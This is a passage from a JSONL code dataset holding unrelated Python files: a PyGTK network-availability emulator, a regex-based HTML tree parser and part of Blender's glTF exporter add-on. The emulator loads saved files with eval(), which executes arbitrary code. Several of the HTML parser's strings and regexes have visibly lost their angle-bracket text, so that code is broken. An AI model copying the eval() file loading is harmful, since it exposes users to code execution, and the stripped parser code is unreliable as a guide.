main(sys.argv[1:])\n","sub_path":"bin/sendmail.py","file_name":"sendmail.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"624314315","text":"# -*- coding: utf-8 -*-\n\nfrom functools import wraps\nfrom random import choice\n\n\nimport pygtk\npygtk.require20()\nimport gtk\n\nfrom numpy import arange, sin, pi\n\nfrom matplotlib.figure import Figure\nfrom matplotlib.axes import Axes\nfrom matplotlib.patches import Patch\nfrom matplotlib.backends.backend_gtkcairo import FigureCanvasGTKCairo as FigureCanvas\nfrom matplotlib.backends.backend_gtkcairo import NavigationToolbar2Cairo as NavigationToolbar\n\n\nfrom emulation import emulation\nfrom utils import ignore_args\nimport defaults\n\n\nclass App(object):\n\n def __init__(self):\n self.builder = gtk.Builder()\n self.builder.add_from_file('ui.glade')\n\n\n self.window_main.connect('destroy', ignore_args(self.quit))\n self.action_quit.connect('activate', ignore_args(self.quit))\n\n self.btn_defaults.connect('clicked', ignore_args(self.defaults))\n self.del_link.connect('clicked', ignore_args(self.delete))\n self.add_link.connect('clicked', ignore_args(self.add))\n self.btn_start.connect('clicked', ignore_args(self.emulate))\n\n self.action_open.connect('activate', ignore_args(self.open_cb))\n self.action_save.connect('activate', ignore_args(self.save_cb))\n self.action_about.connect('activate', ignore_args(self.about_cb))\n\n\n self.figure1 = Figure(figsize=(10, 10), dpi=111)\n self.canvas1 = FigureCanvas(self.figure1) # a gtk.DrawingArea\n self.plot1.pack_start(self.canvas1, True, True, 0)\n\n self.figure2 = Figure(figsize=(10, 10), dpi=111)\n self.canvas2 = FigureCanvas(self.figure2) # a gtk.DrawingArea\n self.plot2.pack_start(self.canvas2, True, True, 0)\n\n toolbar = NavigationToolbar(self.canvas1, self.window_main)\n self.plot1.pack_start(toolbar, False, False, 0)\n\n toolbar = NavigationToolbar(self.canvas2, self.window_main)\n self.plot2.pack_start(toolbar, False, False, 0)\n\n for i in range(4):\n column = self.links_view.get_column(i)\n cell_renderer = column.get_cell_renderers()[0]\n def edited_cb(cell, path, new_text, data):\n store, col_num = data\n if col_num == 2:\n new_text = int(new_text)\n elif col_num == 3:\n new_text = float(new_text)\n store[path][col_num] = new_text\n return\n cell_renderer.connect('edited', edited_cb, (self.links_store, i))\n\n def about_cb(self):\n self.about_dialog.run()\n self.about_dialog.hide()\n\n def open_cb(self):\n result = self.open_dialog.run()\n if result == 0:\n filename = self.open_dialog.get_filename()\n with open(filename, 'r') as f:\n try:\n o = eval(f.read())\n self.set_links(o)\n except:\n self.open_dialog.hide()\n self.bad_file()\n self.open_dialog.hide()\n\n def save_cb(self):\n result = self.save_dialog.run()\n if result == 0:\n filename = self.save_dialog.get_filename()\n with open(filename, 'w') as f:\n s = unicode(self.get_links())\n f.write(s)\n self.save_dialog.hide()\n\n def __getattr__(self, name):\n obj = self.builder.get_object(name)\n if not obj:\n raise AttributeError(\"Object {0} has no attribute {1}\".format(self, name))\n setattr(self, name, obj)\n return obj\n\n def run(self):\n self.window_main.show_all()\n gtk.main()\n\n def quit(self):\n self.window_main.destroy()\n gtk.main_quit()\n\n def defaults(self):\n self.input_duration.set_text(str(defaults.emulation_duration))\n self.input_min_lifetime.set_text(str(defaults.connection_min_lifetime))\n self.input_max_lifetime.set_text(str(defaults.connection_max_lifetime))\n self.input_connections_count.set_text(str(defaults.connections_count))\n links = defaults.links\n avail_classes = defaults.link_avail_classes\n bandwidth = defaults.wavelengths_per_link\n self.set_links([(l[0], l[1], bandwidth, choice(avail_classes)) for l in links])\n\n def set_links(self, links):\n self.links_store.clear()\n try:\n for l in links:\n self.links_store.append(l)\n except TypeError:\n self.data_error()\n\n\n def get_links(self):\n i = self.links_store.get_iter_first()\n links = []\n while i is not None:\n link = (\n self.links_store.get_value(i, 0),\n self.links_store.get_value(i, 1),\n int(self.links_store.get_value(i, 2)),\n float(self.links_store.get_value(i, 3)),\n )\n links.append(link)\n i = self.links_store.iter_next(i)\n return links\n\n def data_error(self):\n self.data_error_dialog.run()\n self.data_error_dialog.hide()\n\n def bad_file(self):\n self.bad_file_dialog.run()\n self.bad_file_dialog.hide()\n\n def delete(self):\n store, row = self.links_view.get_selection().get_selected()\n store.remove(row)\n\n def add(self):\n row = self.links_store.append([\"\", \"\", 0, 0])\n column = self.links_view.get_column(0)\n path = self.links_store.get_path(row)\n self.links_view.set_cursor(path, column, True)\n\n def emulate(self):\n\n try:\n duration = int(self.input_duration.get_text())\n min_lifetime = int(self.input_min_lifetime.get_text())\n max_lifetime = int(self.input_max_lifetime.get_text())\n connections_count = int(self.input_connections_count.get_text())\n if max_lifetime - min_lifetime < 1 or duration < 10 or connections_count < 10:\n self.data_error()\n except ValueError:\n self.data_error()\n\n\n links = self.get_links()\n\n def set_progress(fraction):\n self.progressbar1.set_fraction(fraction)\n gtk.main_iteration()\n\n fits = defaults.fits\n\n stats = emulation(duration,\n links,\n min_lifetime,\n max_lifetime,\n connections_count,\n fits,\n set_progress)\n\n\n # plot 1\n def avail(fit):\n for s in stats:\n if s.fit == fit:\n stat = s\n avails = []\n for c in stat.connections:\n avails.append(1 - (float(c.failed_time) / c.request.lifetime))\n return sum(avails) / len(avails)\n avails = list(map(avail, fits))\n\n self.figure1.clear()\n\n axes = self.figure1.add_subplot(111)\n axes.set_ylim(0.97, 1.0)\n axes.set_ylabel('Connection Availability')\n axes.set_xlabel('Failure-In-Time')\n axes.plot(fits, avails, 'o-')\n\n self.canvas1.draw()\n\n # plot 2\n\n sla = {\n 0.99: [],\n 0.999: [],\n 0.9999: [],\n }\n for s in stats:\n for c in s.connections:\n sla[c.request.sla].append(c)\n p = {\n 0.99: [0, 0, 0], # unprotected, shared, dedicated\n 0.999: [0, 0, 0],\n 0.9999: [0, 0, 0],\n }\n\n for cls, stat in p.items():\n for c in sla[cls]:\n if c.backup is None or len(c.backup) == 0:\n stat[0] += 1\n elif c.dedicated is True:\n stat[2] += 1\n else:\n stat[1] += 1\n print(p, stats)\n self.figure2.clear()\n\n labels = 'unprotected', 'shared', 'dedicated'\n colors = 'g', 'b', 'r'\n\n axes = Axes(self.figure2, [0, 0, 0.5, 0.5])\n axes.set_aspect(1)\n axes.pie(p[0.99], colors=colors, autopct='%1.1f%%')\n axes.set_title('0.99')\n self.figure2.add_axes(axes)\n\n axes = Axes(self.figure2, [0.5, 0, 0.5, 0.5])\n axes.set_aspect(1)\n axes.pie(p[0.999], colors=colors, autopct='%1.1f%%')\n axes.set_title('0.999')\n self.figure2.add_axes(axes)\n\n axes = Axes(self.figure2, [0.25, 0.4, 0.5, 0.5])\n axes.set_aspect(1)\n axes.pie(p[0.9999], colors=colors, autopct='%1.1f%%')\n axes.set_title('0.9999')\n self.figure2.add_axes(axes)\n\n self.figure2.legend((Patch(facecolor='g'), Patch(facecolor='b'), Patch(facecolor='r')),\n labels)\n\n self.canvas2.draw()\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n App().run()\n","sub_path":"agsdp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"546798186","text":"\"\"\"\nHTMLTree Libary provides a simple interface for\naccessing and manipulating HTML documents.Inspired\nfrom htmldom and BeautifulSoup\n\"\"\"\nimport re\nfrom htmlentitydefs import codepoint2name\n\nElementName = r'<([\\w\\d]+)'\nRestName = r'((?:\\s*[-:\\w\\d]+\\s*=\\s*(?:\\'[^\\']*\\'|\"[^\"]*\"|[^\\'\">\\s]*))*)\\s*/?>'\n\n#StartTag\nStartTag = re.compile(ElementName+RestName)\n#EndTag\nEndTag = re.compile(r']+>')\n\n#Used to split attributes into name/value pair\nAttributeSplitter = re.compile(r'(?:\\s*([\\w\\d]+)\\s*=\\s*[\\'\"]([^\\'\"]+)[\\'\"]\\s*)')\n\nWhiteSpace = re.compile(r'\\s+')\n\nEmptyElements=set([\"br\", \"hr\", \"meta\", \"link\", \n \"base\", \"link\", \"img\", \"embed\",\n \"param\", \"area\", \"col\", \"input\",\n \"basefont\", \"frame\", \"isindex\"])\n\nclass HTMLEntitySubstitution:\n \"\"\"\n Substitute HTML entities for the corresponding characters.\n \"\"\"\n\n def _populate_class_variable():\n \n lookup={}\n for codepoint,name in list(codepoint2name.items()):\n character=unichr(codepoint)\n lookup[name]=character\n return lookup\n\n HTML_ENTITY_TO_CHARACTER=_populate_class_variable()\n HTML_ENTITY_RE=re.compile(r'&#(\\d+?);|&(.+?);')\n \n @classmethod\n def _substitute_html_entities(cls,match_obj):\n \"\"\"\n Used with a regular expression to substitute the\n html entities for characters.\n \"\"\"\n codepoint=match_obj.group(1)\n if codepoint:\n return unichr(int(codepoint))\n else:\n return cls.HTML_ENTITY_TO_CHARACTER.get(match_obj.group(2))\n\n @classmethod\n def substitute_html(cls,s):\n \"\"\"\n Replace certain html entities with unicode character.\n \"\"\"\n return cls.HTML_ENTITY_RE.sub(\\\n cls._substitute_html_entities,s)\n\n\n\nclass Tag:\n \"\"\"\n Represents a HTML tag with its attributes and contents\n \"\"\"\n HTML_Formater=HTMLEntitySubstitution.substitute_html\n\n def __init__(self,name,text=''):\n \"\"\"Initialize and reset this instance.\"\"\"\n self.name=name\n self.text=text\n self.reset()\n\n def reset(self):\n \"\"\"Reset this instance.\"\"\"\n self.attrs={}\n self.contents=[]\n self.parent=None\n self.previous_sibling=None\n self.next_sibling=None\n self.previous_element=None\n self.next_element=None\n\n def set_attrs(self,attrDict):\n self.attrs.update(attrDict)\n\n def get_name(self):\n return self.name\n\n def is_empty_element(self):\n \"\"\"Is this tag an empty-element tag?\n (aka a self-closing tag).\"\"\"\n return self.name in EmptyElements\n\n def format_string(self,s):\n \"\"\"\n Format the given string using class variable HTML_Formater.\n \"\"\"\n return self.HTML_Formater(s)\n\n def to_string(self,indent_level=None):\n \"\"\"Returns a string representation of this\n tag and its contents.\"\"\"\n \n pretty_print=(indent_level is not None)\n\n attr_list=[]\n\n if self.attrs:\n for k,v in sorted(self.attrs.items()):\n pair=' %s=\"%s\"' % (k,v)\n attr_list.append(pair)\n attr_string=''.join(attr_list)\n\n close=''\n close_tag=''\n\n if self.is_empty_element():\n close='/'\n else:\n close_tag='' % self.name\n\n s=[]\n if pretty_print:\n space=(' '*(indent_level-1))\n indent_contents=indent_level+1\n else:\n space=''\n indent_contents=None\n s.append(space)\n s.append('<%s%s%s>' % (self.name,attr_string,close))\n if pretty_print:\n s.append('\\n')\n contents=self.contents_to_string(indent_contents)\n s.append(contents)\n if pretty_print and contents and contents[-1] != '\\n':\n s.append('\\n')\n s.append(space)\n s.append(close_tag)\n if pretty_print and self.next_sibling and close_tag:\n s.append('\\n')\n return ''.join(s) \n\n def contents_to_string(self,indent_level=None):\n \"\"\"Renders the contents of this tag as a string\"\"\"\n pretty_print=(indent_level is not None)\n contents=[]\n for c in self:\n if c.text:\n if pretty_print:\n contents.append(' '*(indent_level-1))\n text=self.format_string(c.text)\n contents.append(text)\n else:\n string=c.to_string(indent_level)\n contents.append(string)\n return ''.join(contents)\n \n\n def prettify(self):\n return self.to_string(True) \n\n def descendants(self):\n \"\"\"Generator method which returns all descendants\"\"\"\n if len(self.contents) < 1:\n return\n stopNode=self.last_descendant().next_element\n currentNode=self.contents[0]\n while currentNode is not stopNode:\n yield currentNode\n currentNode=currentNode.next_element\n\n def append(self,tag):\n self._insert(len(self.contents),tag)\n\n\n def last_descendant(self):\n last_child=self\n while last_child.contents:\n last_child=last_child.contents[-1]\n return last_child\n\n def find_all(self,name):\n \"\"\"Extracts a list of Tag objects that match the given criteria.\"\"\"\n return [element for element in self.descendants() if element.name==name]\n\n def _insert(self,position,new_child):\n\n pos=min(position,len(self.contents))\n\n if pos == 0:\n new_child.previous_element=self\n self.next_element=new_child\n else:\n previous_sibling=self.contents[-1]\n new_child.previous_sibling=previous_sibling\n previous_sibling.next_sibling=new_child\n previous_element=previous_sibling.last_descendant()\n if previous_element:\n new_child.previous_element=previous_element\n previous_element.next_element=new_child\n\n self.contents.append(new_child)\n \n\n def __repr__(self):\n \"\"\"Renders this tag as a string.\"\"\"\n return self.to_string()\n\n def __iter__(self):\n \"\"\"Iterating tag over its contents\"\"\"\n return iter(self.contents)\n\n def get_text(self):\n \"\"\"Get all child text.\"\"\"\n string=[]\n for c in self:\n if c.text:\n text=self.format_string(c.text).strip()\n string.append(text+'\\n')\n else:\n if c.name == 'script' or c.name == 'style':\n continue\n string.append(c.get_text())\n return ''.join(string)\n \n\n\nclass HTMLTreeBuilder:\n \"\"\"Converting a html file into a dom tree\"\"\"\n def __init__(self):\n self.root_tag=None\n\n def feed(self,doc,encoding='utf8'):\n #tagStack holds parent tags.The top tag will be current's parent\n tagStack=[]\n comment_string='')\n #Just pass through comment tag\n doc=doc[index+3:].strip()\n continue\n\n index=doc.find('<')\n\n #Len(nodeStack) >= 1 means found text\n #content between the end of a tag and the\n #start of a new tag\n if len(tagStack) > 0:\n _index=-1\n #if \"script\" element is on the top of\n #the stack then entire content of it will\n #be stored in a single text node\n if tagStack[-1].get_name() == 'script':\n _index=doc.find('')\n if _index != -1:\n tmpData=doc[:_index]\n #if \"script\" element is on the top of\n #the stack then entire content of it will\n #be stored in a single text node\n elif tagStack[-1].get_name() == 'style':\n _index=doc.find('')\n if _index != -1: \n tmpData=doc[:index]\n\n else:\n tmpData=doc[:index]\n\n #tmpData should not be empty\n if tmpData:\n new_tag=Tag('text',tmpData)\n tagStack[-1].append(new_tag)\n if _index != -1:\n doc=doc[_index:].strip()\n else:\n doc=doc[index:].strip()\n else:\n doc=doc.strip()\n\n #end of a tag\n if doc.find(' Import-Export',\n 'description': 'Import-Export as glTF 2.0',\n 'warning': '',\n 'doc_url': \"{BLENDER_MANUAL_URL}/addons/import_export/scene_gltf2.html\",\n 'tracker_url': \"https://github.com/KhronosGroup/glTF-Blender-IO/issues/\",\n 'support': 'OFFICIAL',\n 'category': 'Import-Export',\n}\n\ndef get_version_string():\n return str(bl_info['version'][0]) + '.' + str(bl_info['version'][1]) + '.' + str(bl_info['version'][2])\n\n#\n# Script reloading (if the user calls 'Reload Scripts' from Blender)\n#\n\ndef reload_package(module_dict_main):\n import importlib\n from pathlib import Path\n\n def reload_package_recursive(current_dir, module_dict):\n for path in current_dir.iterdir():\n if \"__init__\" in str(path) or path.stem not in module_dict:\n continue\n\n if path.is_file() and path.suffix == \".py\":\n importlib.reload(module_dict[path.stem])\n elif path.is_dir():\n reload_package_recursive(path, module_dict[path.stem].__dict__)\n\n reload_package_recursive(Path(__file__).parent, module_dict_main)\n\n\nif \"bpy\" in locals():\n reload_package(locals())\n\nimport bpy\nfrom bpy.props import (StringProperty,\n BoolProperty,\n EnumProperty,\n IntProperty,\n CollectionProperty)\nfrom bpy.types import Operator\nfrom bpy_extras.io_utils import ImportHelper, ExportHelper\n\n\n#\n# Functions / Classes.\n#\n\nexporter_extension_panel_unregister_functors = []\nimporter_extension_panel_unregister_functors = []\n\n\ndef ensure_filepath_matches_export_format(filepath, export_format):\n import os\n filename = os.path.basename(filepath)\n if not filename:\n return filepath\n\n stem, ext = os.path.splitext(filename)\n if stem.startswith('.') and not ext:\n stem, ext = '', stem\n\n desired_ext = '.glb' if export_format == 'GLB' else '.gltf'\n ext_lower = ext.lower()\n if ext_lower not in ['.glb', '.gltf']:\n return filepath + desired_ext\n elif ext_lower != desired_ext:\n filepath = filepath[:-len(ext)] # strip off ext\n return filepath + desired_ext\n else:\n return filepath\n\n\ndef on_export_format_changed(self, context):\n # Update the filename in the file browser when the format (.glb/.gltf)\n # changes\n sfile = context.space_data\n if not isinstance(sfile, bpy.types.SpaceFileBrowser):\n return\n if not sfile.active_operator:\n return\n if sfile.active_operator.bl_idname != \"EXPORT_SCENE_OT_gltf\":\n return\n\n sfile.params.filename = ensure_filepath_matches_export_format(\n sfile.params.filename,\n self.export_format,\n )\n\n\nclass ExportGLTF2_Base:\n # TODO: refactor to avoid boilerplate\n\n def __init__(self):\n from io_scene_gltf2.io.com import gltf2_io_draco_compression_extension\n self.is_draco_available = gltf2_io_draco_compression_extension.dll_exists()\n\n bl_options = {'PRESET'}\n\n export_format: EnumProperty(\n name='Format',\n items=(('GLB', 'glTF Binary (.glb)',\n 'Exports a single file, with all data packed in binary form. '\n 'Most efficient and portable, but more difficult to edit later'),\n ('GLTF_SEPARATE', 'glTF Separate (.gltf + .bin + textures)',\n 'Exports multiple files, with separate JSON, binary and texture data. '\n 'Easiest to edit later'),\n ('GLTF_EMBEDDED', 'glTF Embedded (.gltf)',\n 'Exports a single file, with all data packed in JSON. '\n 'Less efficient than binary, but easier to edit later')),\n description=(\n 'Output format and embedding options. Binary is most efficient, '\n 'but JSON (embedded or separate) may be easier to edit later'\n ),\n default='GLB',\n update=on_export_format_changed,\n )\n\n ui_tab: EnumProperty(\n items=(('GENERAL', \"General\", \"General settings\"),\n ('MESHES', \"Meshes\", \"Mesh settings\"),\n ('OBJECTS', \"Objects\", \"Object settings\"),\n ('ANIMATION', \"Animation\", \"Animation settings\")),\n name=\"ui_tab\",\n description=\"Export setting categories\",\n )\n\n export_copyright: StringProperty(\n name='Copyright',\n description='Legal rights and conditions for the model',\n default=''\n )\n\n export_image_format: EnumProperty(\n name='Images',\n items=(('AUTO', 'Automatic',\n 'Save PNGs as PNGs and JPEGs as JPEGs. '\n 'If neither one, use PNG'),\n ('JPEG', 'JPEG Format (.jpg)',\n 'Save images as JPEGs. (Images that need alpha are saved as PNGs though.) '\n 'Be aware of a possible loss in quality'),\n ),\n description=(\n 'Output format for images. PNG is lossless and generally preferred, but JPEG might be preferable for web '\n 'applications due to the smaller file size'\n ),\n default='AUTO'\n )\n\n export_texture_dir: StringProperty(\n name='Textures',\n description='Folder to place texture files in. Relative to the .gltf file',\n default='',\n )\n\n export_keep_originals: BoolProperty(\n name='Keep original',\n description=('Keep original textures files if possible. '\n 'WARNING: if you use more than one texture, '\n 'where pbr standard requires only one, only one texture will be used. '\n 'This can lead to unexpected results'\n ),\n default=False,\n )\n\n export_texcoords: BoolProperty(\n name='UVs',\n description='Export UVs (texture coordinates) with meshes',\n default=True\n )\n\n export_normals: BoolProperty(\n name='Normals',\n description='Export vertex normals with meshes',\n default=True\n )\n\n export_draco_mesh_compression_enable: BoolProperty(\n name='Draco mesh compression',\n description='Compress mesh using Draco',\n default=False\n )\n\n export_draco_mesh_compression_level: IntProperty(\n name='Compression level',\n description='Compression level (0 = most speed, 6 = most compression, higher values currently not supported)',\n default=6,\n min=0,\n max=10\n )\n\n export_draco_position_quantization: IntProperty(\n name='Position quantization bits',\n description='Quantization bits for position values (0 = no quantization)',\n default=14,\n min=0,\n max=30\n )\n\n export_draco_normal_quantization: IntProperty(\n name='Normal quantization bits',\n description='Quantization bits for normal values (0 = no quantization)',\n default=10,\n min=0,\n max=30\n )\n\n export_draco_texcoord_quantization: IntProperty(\n name='Texcoord quantization bits',\n description='Quantization bits for texture coordinate values (0 = no quantization)',\n default=12,\n min=0,\n max=30\n )\n\n export_draco_color_quantization: IntProperty(\n name='Color quantization bits',\n description='Quantization bits for color values (0 = no quantization)',\n default=10,\n min=0,\n max=30\n )\n\n export_draco_generic_quantization: IntProperty(\n name='Generic quantization bits',\n description='Quantization bits for generic coordinate values like weights or joints (0 = no quantization)',\n default=12,\n min=0,\n max=30\n )\n\n export_tangents: BoolProperty(\n name='Tangents',\n description='Export vertex tangents with meshes',\n default=False\n )\n\n export_materials: EnumProperty(\n name='Materials',\n items=(('EXPORT', 'Export',\n 'Export all materials used by included objects'),\n ('PLACEHOLDER', 'Placeholder',\n 'Do not export materials, but write multiple primitive groups per mesh, keeping material slot information'),\n ('NONE', 'No export',\n 'Do not export materials, and combine mesh primitive groups, losing material slot information')),\n description='Export materials ',\n default='EXPORT'\n )\n\n export_colors: BoolProperty(\n name='Vertex Colors',\n description='Export vertex colors with meshes',\n default=True\n )\n\n use_mesh_edges: BoolProperty(\n name='Loose Edges',\n description=(\n 'Export loose edges as lines, using the material from the first material slot'\n ),\n default=False,\n )\n\n use_mesh_vertices: BoolProperty(\n name='Loose Points',\n description=(\n 'Export loose points as glTF points, using the material from the first material slot'\n ),\n default=False,\n )\n\n export_cameras: BoolProperty(\n name='Cameras',\n description='Export cameras',\n default=False\n )\n\n # keep it for compatibility (for now)\n export_selected: BoolProperty(\n name='Selected Objects',\n description='Export selected objects only',\n default=False\n )\n\n use_selection: BoolProperty(\n name='Selected Objects',\n description='Export selected objects only',\n default=False\n )\n\n use_visible: BoolProperty(\n name='Visible Objects',\n description='Export visible objects only',\n default=False\n )\n\n use_renderable: BoolProperty(\n name='Renderable Objects',\n description='Export renderable objects only',\n default=False\n )\n\n use_active_collection: BoolProperty(\n name='Active Collection',\n description='Export objects in the active collection only',\n default=False\n )\n\n export_extras: BoolProperty(\n name='Custom Properties',\n description='Export custom properties as glTF extras',\n default=False\n )\n\n export_yup: BoolProperty(\n name='+Y Up',\n description='Export using glTF convention, +Y up',\n default=True\n )\n\n export_apply: BoolProperty(\n name='Apply Modifiers',\n description='Apply modifiers (excluding Armatures) to mesh objects -'\n 'WARNING: prevents exporting shape keys',\n default=False\n )\n\n export_animations: BoolProperty(\n name='Animations',\n description='Exports active actions and NLA tracks as glTF animations',\n default=True\n )\n\n export_frame_range: BoolProperty(\n name='Limit to Playback Range',\n description='Clips animations to selected playback range',\n default=True\n )\n\n export_frame_step: IntProperty(\n name='Sampling Rate',\n description='How often to evaluate animated values (in frames)',\n default=1,\n min=1,\n max=120\n )\n\n export_force_sampling: BoolProperty(\n name='Always Sample Animations',\n description='Apply sampling to all animations',\n default=True\n )\n\n export_nla_strips: BoolProperty(\n name='Group by NLA Track',\n description=(\n \"When on, multiple actions become part of the same glTF animation if \"\n \"they're pushed onto NLA tracks with the same name. \"\n \"When off, all the currently assigned actions become one glTF animation\"\n ),\n default=True\n )\n\n export_def_bones: BoolProperty(\n name='Export Deformation Bones Only',\n description='Export Deformation bones only (and needed bones for hierarchy)',\n default=False\n )\n\n export_current_frame: BoolProperty(\n name='Use Current Frame',\n description='Export the scene in the current animation frame',\n default=False\n )\n\n export_skins: BoolProperty(\n name='Skinning',\n description='Export skinning (armature) data',\n default=True\n )\n\n export_all_influences: BoolProperty(\n name='Include All Bone Influences',\n description='Allow >4 joint vertex influences. Models may appear incorrectly in many viewers',\n default=False\n )\n\n export_morph: BoolProperty(\n name='Shape Keys',\n description='Export shape keys (morph targets)',\n default=True\n )\n\n export_morph_normal: BoolProperty(\n name='Shape Key Normals',\n description='Export vertex normals with shape keys (morph targets)',\n default=True\n )\n\n export_morph_tangent: BoolProperty(\n name='Shape Key Tangents',\n description='Export vertex tangents with shape keys (morph targets)',\n default=False\n )\n\n export_lights: BoolProperty(\n name='Punctual Lights',\n description='Export directional, point, and spot lights. '\n 'Uses \"KHR_lights_punctual\" glTF extension',\n default=False\n )\n\n export_displacement: BoolProperty(\n name='Displacement Textures (EXPERIMENTAL)',\n description='EXPERIMENTAL: Export displacement textures. '\n 'Uses incomplete \"KHR_materials_displacement\" glTF extension',\n default=False\n )\n\n will_save_settings: BoolProperty(\n name='Remember Export Settings',\n description='Store glTF export settings in the Blender project',\n default=False)\n\n # Custom scene property for saving settings\n scene_key = \"glTF2ExportSettings\"\n\n #\n\n def check(self, _context):\n # Ensure file extension matches format\n old_filepath = self.filepath\n self.filepath = ensure_filepath_matches_export_format(\n self.filepath,\n self.export_format,\n )\n return self.filepath != old_filepath\n\n def invoke(self, context, event):\n settings = context.scene.get(self.scene_key)\n self.will_save_settings = False\n if settings:\n try:\n for (k, v) in settings.items():\n if k == \"export_selected\": # Back compatibility for export_selected --> use_selection\n setattr(self, \"use_selection\", v)\n del settings[k]\n settings[\"use_selection\"] = v\n print(\"export_selected is now renamed use_selection, and will be deleted in a few release\")\n else:\n setattr(self, k, v)\n self.will_save_settings = True\n\n except (AttributeError, TypeError):\n self.report({\"ERROR\"}, \"Loading export settings failed. Removed corrupted settings\")\n del context.scene[self.scene_key]\n\n import sys\n preferences = bpy.context.preferences\n for addon_name in preferences.addons.keys():\n try:\n if hasattr(sys.modules[addon_name], 'glTF2ExportUserExtension') or hasattr(sys.modules[addon_name], 'glTF2ExportUserExtensions'):\n exporter_extension_panel_unregister_functors.append(sys.modules[addon_name].register_panel())\n except Exception:\n pass\n\n self.has_active_exporter_extensions = len(exporter_extension_panel_unregister_functors) > 0\n return ExportHelper.invoke(self, context, event)\n\n def save_settings(self, context):\n # find all props to save\n exceptional = [\n # options that don't start with 'export_'\n 'use_selection',\n 'use_visible',\n 'use_renderable',\n 'use_active_collection',\n 'use_mesh_edges',\n 'use_mesh_vertices',\n ]\n all_props = self.properties\n export_props = {\n x: getattr(self, x) for x in dir(all_props)\n if (x.startswith(\"export_\") or x in exceptional) and all_props.get(x) is not None\n }\n\n context.scene[self.scene_key] = export_props\n\n def execute(self, context):\n import os\n import datetime\n from .blender.exp import gltf2_blender_export\n\n if self.will_save_settings:\n self.save_settings(context)\n\n self.check(context) # ensure filepath has the right extension\n\n # All custom export settings are stored in this container.\n export_settings = {}\n\n export_settings['timestamp'] = datetime.datetime.now()\n\n export_settings['gltf_filepath'] = self.filepath\n export_settings['gltf_filedirectory'] = os.path.dirname(export_settings['gltf_filepath']) + '/'\n export_settings['gltf_texturedirectory'] = os.path.join(\n export_settings['gltf_filedirectory'],\n self.export_texture_dir,\n )\n export_settings['gltf_keep_original_textures'] = self.export_keep_originals\n\n export_settings['gltf_format'] = self.export_format\n export_settings['gltf_image_format'] = self.export_image_format\n export_settings['gltf_copyright'] = self.export_copyright\n export_settings['gltf_texcoords'] = self.export_texcoords\n export_settings['gltf_normals'] = self.export_normals\n export_settings['gltf_tangents'] = self.export_tangents and self.export_normals\n export_settings['gltf_loose_edges'] = self.use_mesh_edges\n export_settings['gltf_loose_points'] = self.use_mesh_vertices\n\n if self.is_draco_available:\n export_settings['gltf_draco_mesh_compression'] = self.export_draco_mesh_compression_enable\n export_settings['gltf_draco_mesh_compression_level'] = self.export_draco_mesh_compression_level\n export_settings['gltf_draco_position_quantization'] = self.export_draco_position_quantization\n export_settings['gltf_draco_normal_quantization'] = self.export_draco_normal_quantization\n export_settings['gltf_draco_texcoord_quantization'] = self.export_draco_texcoord_quantization\n export_settings['gltf_draco_color_quantization'] = self.export_draco_color_quantization\n export_settings['gltf_draco_generic_quantization'] = self.export_draco_generic_quantization\n else:\n export_settings['gltf_draco_mesh_compression'] = False\n\n export_settings['gltf_materials'] = self.export_materials\n export_settings['gltf_colors'] = self.export_colors\n export_settings['gltf_cameras'] = self.export_cameras\n\n # compatibility after renaming export_selected to use_selection\n if self.export_selected is True:\n self.report({\"WARNING\"}, \"export_selected is now renamed use_selection, and will be deleted in a few release\")\n export_settings['gltf_selected'] = self.export_selected\n else:\n export_settings['gltf_selected'] = self.use_selection\n\n export_settings['gltf_visible'] = self.use_visible\n export_settings['gltf_renderable'] = self.use_renderable\n export_settings['gltf_active_collection'] = self.use_active_collection\n\n # export_settings['gltf_selected'] = self.use_selection This can be uncomment when removing compatibility of export_selected\n export_settings['gltf_layers'] = True # self.export_layers\n export_settings['gltf_extras'] = self.export_extras\n export_settings['gltf_yup'] = self.export_yup\n export_settings['gltf_apply'] = self.export_apply\n export_settings['gltf_current_frame'] = self.export_current_frame\n export_settings['gltf_animations'] = self.export_animations\n if self.export_animations:\n export_settings['gltf_frame_range'] = self.export_frame_range\n export_settings['gltf_force_sampling'] = self.export_force_sampling\n if self.export_force_sampling:\n export_settings['gltf_def_bones'] = self.export_def_bones\n else:\n export_settings['gltf_def_bones'] = False\n export_settings['gltf_nla_strips'] = self.export_nla_strips\n else:\n export_settings['gltf_frame_range'] = False\n export_settings['gltf_move_keyframes'] = False\n export_settings['gltf_force_sampling'] = False\n export_settings['gltf_def_bones'] = False\n export_settings['gltf_skins'] = self.export_skins\n if self.export_skins:\n export_settings['gltf_all_vertex_influences'] = self.export_all_influences\n else:\n export_settings['gltf_all_vertex_influences'] = False\n export_settings['gltf_frame_step'] = self.export_frame_step\n export_settings['gltf_morph'] = self.export_morph\n if self.export_morph:\n export_settings['gltf_morph_normal'] = self.export_morph_normal\n else:\n export_settings['gltf_morph_normal'] = False\n if self.export_morph and self.export_morph_normal:\n export_settings['gltf_morph_tangent'] = self.export_morph_tangent\n else:\n export_settings['gltf_morph_tangent'] = False\n\n export_settings['gltf_lights'] = self.export_lights\n export_settings['gltf_displacement'] = self.export_displacement\n\n export_settings['gltf_binary'] = bytearray()\n export_settings['gltf_binaryfilename'] = (\n os.path.splitext(os.path.basename(self.filepath))[0] + '.bin'\n )\n\n user_extensions = []\n pre_export_callbacks = []\n post_export_callbacks = []\n\n import sys\n preferences = bpy.context.preferences\n for addon_name in preferences.addons.keys():\n try:\n module = sys.modules[addon_name]\n except Exception:\n continue\n if hasattr(module, 'glTF2ExportUserExtension'):\n extension_ctor = module.glTF2ExportUserExtension\n user_extensions.append(extension_ctor())\n if hasattr(module, 'glTF2ExportUserExtensions'):\n extension_ctors = module.glTF2ExportUserExtensions\n for extension_ctor in extension_ctors:\n user_extensions.append(extension_ctor())\n if hasattr(module, 'glTF2_pre_export_callback'):\n pre_export_callbacks.append(module.glTF2_pre_export_callback)\n if hasattr(module, 'glTF2_post_export_callback'):\n post_export_callbacks.append(module.glTF2_post_export_callback)\n export_settings['gltf_user_extensions'] = user_extensions\n export_settings['pre_export_callbacks'] = pre_export_callbacks\n export_settings['post_export_callbacks'] = post_export_callbacks\n\n return gltf2_blender_export.save(context, export_settings)\n\n def draw(self, context):\n pass # Is needed to get panels available\n\n\nclass GLTF_PT_export_main(bpy.types.Panel):\n bl_space_type = 'FILE_BROWSER'\n 